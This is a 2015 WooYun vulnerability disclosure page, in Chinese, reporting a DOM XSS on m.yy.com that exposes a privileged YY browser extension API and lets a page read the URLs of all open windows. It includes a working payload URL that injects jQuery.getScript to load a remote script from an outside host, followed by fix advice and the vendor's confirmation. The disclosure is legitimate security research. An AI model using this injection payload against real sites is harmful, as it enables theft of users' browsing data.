当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0110228

漏洞标题:YY浏览器设计缺陷导致存在跨域漏洞

相关厂商:广州多玩

漏洞作者: 梧桐雨

提交时间:2015-04-25 00:54

修复时间:2015-07-26 17:38

公开时间:2015-07-26 17:38

漏洞类型:设计错误/逻辑缺陷

危害等级:高

自评Rank:12

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-04-25: 细节已通知厂商并且等待厂商处理中
2015-04-27: 厂商已经确认,细节仅向厂商公开
2015-04-30: 细节向第三方安全合作伙伴开放
2015-06-21: 细节向核心白帽子及相关领域专家公开
2015-07-01: 细节向普通白帽子公开
2015-07-11: 细节向实习白帽子公开
2015-07-26: 细节向公众公开

简要描述:

可以跨窗口读取用户信息

详细说明:

在最近的更新里,发现yy已经将浏览器插件的2处xss漏洞均已经修补。但是更新却又带来了新的安全问题。
譬如在m.yy.com 允许执行特定的危险API:

chrome.tabs.getAllInWindow


在早期版本的时候,只有ie.yy.com 以及wan.yy.com 允许执行该函数接口。当初寻找良久,挨个挨个看,都没发现有明显的xss漏洞。这一次的更新:最新版:

yy.jpg


之前给你们报过此处xss漏洞,并且你们已经修补过一次这里的xss漏洞:m.yy.com,是一个domxss,但是在今天测试发现你们的修补又失效了。猜测是程序员修补的时候又把旧代码覆盖了?

222.jpg


经过对你们源码的观察,发现你们引入了jquery,允许通过
jQuery.getScript() 来获取远程js内容。
直接构造:
http://m.yy.com/live/toRank.action?f=%22);%0ajQuery.getScript(%22http://wutongyu.info/1.js%22)//
打开可以看到获取了我所有窗口的url内容:

window.jpg


1.jpg


2.jpg


3.jpg


4.jpg

漏洞证明:

都在详细说明里头。

修复方案:

1:)彻底修补此处xss。
2:)特权域不要过多,避免随意一个分站点的xss直接对用户浏览器构成威胁。

版权声明:转载请注明来源 梧桐雨@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-04-27 17:37

厂商回复:

感谢欢聚时代对安全工作的支持,我们会尽快安排修复!

最新状态:

暂无


漏洞评价:

评论

  1. 2015-04-27 20:21 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    YY竟然还有浏览器

  2. 2015-04-27 21:25 | 数据流 ( 普通白帽子 | Rank:716 漏洞数:88 | all or nothing,now or never)

    YY竟然还有浏览器

  3. 2015-04-28 09:38 | _Evil ( 普通白帽子 | Rank:418 漏洞数:59 | 万事无他,唯手熟尔。农民也会编程,别指望天...)

    说好的回家考驾照呢...

  4. 2015-05-01 00:43 | 明月影 ( 路人 | Rank:12 漏洞数:8 | 学姿势,学思路。)

    关注。